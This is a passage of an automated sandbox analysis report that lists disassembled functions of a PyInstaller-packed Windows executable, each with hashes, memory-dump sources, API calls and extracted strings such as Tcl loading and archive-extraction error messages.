                                                            • Instruction ID: d3dba95e729d76422a9c08eae7991f0fe518513f09ba8517fb47e5cd868b1447
                                                            • Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
                                                            • Instruction Fuzzy Hash: 1851E836E18A5581E7259B2DD458238B7A0EB66B5CFB44031CF4C177ACCF7AE842C750
                                                            Function 00007FF7B1106510 Relevance: .1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                            • Instruction ID: 70fb20ca985928b690e25e5649b045f8f63ae1396c967f892cef9560b70f87fa
                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                            • Instruction Fuzzy Hash: D1419362C0974E04EF95991C29087B8A781DF73BE8DB852B0DF99133CEDD4E6996C220
                                                            Function 00007FF7B110AA10 Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: a584b5ebd410868caf684851e7ae72ca0a48fe722538065b11fe9c603729eb0f
                                                            • Instruction ID: c589d36dad4d412a495908ee390ad39a73067a0fe37a8918ba3f0d17900afd25
                                                            • Opcode Fuzzy Hash: a584b5ebd410868caf684851e7ae72ca0a48fe722538065b11fe9c603729eb0f
                                                            • Instruction Fuzzy Hash: DC410562B14A5982EF04DF6EE924569B3A2FB59FC4B999032DF0D97B58DE7CD0418300
                                                            Function 00007FF7B1108278 Relevance: .1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                            • Instruction ID: 1b2a08918c3d485887609f5fad1db86e5605e7c9eeaaf1f8e919d9f980daf4b7
                                                            • Opcode Fuzzy Hash: d2b002bbc49f8edc76fb8066870c38d7afee558bd2249c300808c44e7bc92a50
                                                            • Instruction Fuzzy Hash: 6D31E432E1CB4581E764AB29744412DF794EBC6B94F644238EB8957BDACF7CD0128314
                                                            Function 00007FF7B111A420 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aa2e9ba6296ea42dd861dc7f4a70719f263379b300c18e22927abb196144ca8
                                                            • Instruction ID: 16906d87a13e59a90dad3b938d71dec8aa51ffbec54d1eb7719812d9c4e1b74c
                                                            • Opcode Fuzzy Hash: 4aa2e9ba6296ea42dd861dc7f4a70719f263379b300c18e22927abb196144ca8
                                                            • Instruction Fuzzy Hash: 99F06871B182999ADB98AF2DB402629BBD0F719384F808439D68D87B0CD67C90608F14
                                                            Function 00007FF7B10FC88C Relevance: .0, Instructions: 2COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba86f607178f2dc3ef803bbc4180c5da227c40ec501de79dfe2d660df2792ade
                                                            • Instruction ID: 6d1ec70d68ad048c5be37f6c7b36de5cdbace253236d49ebd3439c5c7d6737d4
                                                            • Opcode Fuzzy Hash: ba86f607178f2dc3ef803bbc4180c5da227c40ec501de79dfe2d660df2792ade
                                                            • Instruction Fuzzy Hash: A2A00121988816E4E745AB0DA992520A360AB62319FC10032D60E810A89FACA551C620
                                                            Function 00007FF7B10F6EF0 Relevance: 164.8, APIs: 31, Strings: 63, Instructions: 263libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                            • API String ID: 190572456-2208601799
                                                            • Opcode ID: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                            • Instruction ID: e4bef52dadfbbf9545d63edc97f1b2f004eb64cc39f745774ab8aec41f84a601
                                                            • Opcode Fuzzy Hash: d06a92813886bac4db22892db141582495630975dbcfbb846e36d04df9038670
                                                            • Instruction Fuzzy Hash: FDE1FA65A0EB0B90FB56EB4CB891174E3A1AF2775CFC55531CA0D0669CEFFCB1688260
                                                            Function 00007FF7B10F12A0 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message_fread_nolock
                                                            • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                            • API String ID: 3065259568-2316137593
                                                            • Opcode ID: 158d00d3fa35f6ec523f5cd77b2a764e4e84d15d3d6112a4d59896a6fa0a4bdf
                                                            • Instruction ID: 068335375ba56057879f6bb82f8d15a12f9e86b57d1fdf9cadbc1cfe1826ab00
                                                            • Opcode Fuzzy Hash: 158d00d3fa35f6ec523f5cd77b2a764e4e84d15d3d6112a4d59896a6fa0a4bdf
                                                            • Instruction Fuzzy Hash: DE519321A0868785EB20B719A8922FAE354EF667DCFD04031EF4D47A8DEEBCF5418750
                                                            Function 00007FF7B10F23D0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                            • String ID: P%
                                                            • API String ID: 2147705588-2959514604
                                                            • Opcode ID: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                            • Instruction ID: 181a4a601d6284a66c23e37b7b80b482bf4417590cbbc03edbaab74f5f91607b
                                                            • Opcode Fuzzy Hash: 4ec0923ad57b9e26d950b98539eabaaac0ee0779749769c2f3ee915382542b09
                                                            • Instruction Fuzzy Hash: 735119266187A186D734AF26F0582BAF7A1F7A9B65F004121EFCE43684DF7CD055DB20
                                                            Function 00007FF7B1106D84 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: -$:$f$p$p
                                                            • API String ID: 3215553584-2013873522
                                                            • Opcode ID: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                            • Instruction ID: 0941eb0079ba6d034186fc3ee93e9f4789cd7d939914e03fd557f03acaa42598
                                                            • Opcode Fuzzy Hash: c2e3e1b204f81d5d3111ec2c6225d8aa08a7090ee70090e6a6c227d1fd7f1b68
                                                            • Instruction Fuzzy Hash: 76129261E0C14B86FB20BA18F159679F752EB62758FE48135EBC9466C8DFBCE4808770
                                                            Function 00007FF7B11016E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: f$f$p$p$f
                                                            • API String ID: 3215553584-1325933183
                                                            • Opcode ID: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                            • Instruction ID: 1aba04873dcc2d6b74dc28074ad4cfa72bf9a00f4afea3e0f88efc8abd1202b4
                                                            • Opcode Fuzzy Hash: f25701e18b7e3b768cc97be4ad67ee6babc8222917340eb79faa42be88ba5edf
                                                            • Instruction Fuzzy Hash: 5E127321E0C18BC5FB207A58F15C679B7A2FB62758FE44136E799465CCDBBCE5808B20
                                                            Function 00007FF7B10F1590 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                            • API String ID: 2030045667-3659356012
                                                            • Opcode ID: a80852cf7a0435982f1b2a2e47e4ceb785ea7fc5e965373e9eced2b197ef6b24
                                                            • Instruction ID: 08d55de3c1c5554226fca1ed380403664d293adc82609c27838dd3e54702706e
                                                            • Opcode Fuzzy Hash: a80852cf7a0435982f1b2a2e47e4ceb785ea7fc5e965373e9eced2b197ef6b24
                                                            • Instruction Fuzzy Hash: B531B821B0864781EB24BB1AB4916BAE350EF267DCFD44431DF4D07A5DEEBCE5458710
                                                            Function 00007FF7B10FF120 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 849930591-393685449
                                                            • Opcode ID: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                            • Instruction ID: 23bfc0f63d1bcc1c8fd6a59d6615db3aa4b58962a5f9c92476d20113d2852f59
                                                            • Opcode Fuzzy Hash: aa0254fa6ad752d1b0b3ebb90ffce52311fa0a6dd2bc18c7a97eb297d781420a
                                                            • Instruction Fuzzy Hash: E2D1A373A0874286EB60AF69D4822ADB7A0FB66B9CF900135DF4D57799CF78E041C750
                                                            Function 00007FF7B10F87A0 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F8837
                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F888E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 626452242-27947307
                                                            • Opcode ID: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                            • Instruction ID: d1e6624437fbb74f2cc2633b7e8ec7b7c058c83b99a18570ff70b1f681174541
                                                            • Opcode Fuzzy Hash: da25680c1af6adbbd75f9aaa9149da67c4ccf9ada2fcee16a4d67ff34c50752a
                                                            • Instruction Fuzzy Hash: 6C41C532A0CB4682E760EF19B48116AF7A1FB96798FA44135DB8D43B98DF7CD055C710
                                                            Function 00007FF7B10F8CE0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F8D21
                                                              • Part of subcall function 00007FF7B10F29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7B10F88E2,?,?,?,?,?,?,?,?,?,?,?,00007FF7B10F101D), ref: 00007FF7B10F29F4
                                                              • Part of subcall function 00007FF7B10F29C0: MessageBoxW.USER32 ref: 00007FF7B10F2AD0
                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7B10F39CA), ref: 00007FF7B10F8D95
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                            • API String ID: 3723044601-27947307
                                                            • Opcode ID: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                            • Instruction ID: f76b55c3acc5a6233ab91470a820d78c410317779ce38ff5ae1c32cecc0f0340
                                                            • Opcode Fuzzy Hash: 24e20b950f9c341c4949047225b46873ae1dde5e69406ebada3fd8935fcb2f41
                                                            • Instruction Fuzzy Hash: BC219325A0DB4685EB10FB5DB8810A8F761EFA6B88FD44136CB0D43798EF7CE5118310
                                                            Function 00007FF7B10F75A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                            • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                            • API String ID: 3231891352-3501660386
                                                            • Opcode ID: 95a07afb7437e9fdb1036844a629e41653b489b2c1128e3c944f638e5aaf148e
                                                            • Instruction ID: ee39ceb45709e28ad28fcfe24c499c978515abef124953dedb27ee071898fa49
                                                            • Opcode Fuzzy Hash: 95a07afb7437e9fdb1036844a629e41653b489b2c1128e3c944f638e5aaf148e
                                                            • Instruction Fuzzy Hash: 61519311E1D64741FB11B71DA9922BDE391AF677C8FC40030EB4D466DEDEACE5008761
                                                            Function 00007FF7B10FE1B8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE23D
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE24B
                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE275
                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE2E3
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7B10FE46A,?,?,?,00007FF7B10FD39C,?,?,?,00007FF7B10FCF91), ref: 00007FF7B10FE2EF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
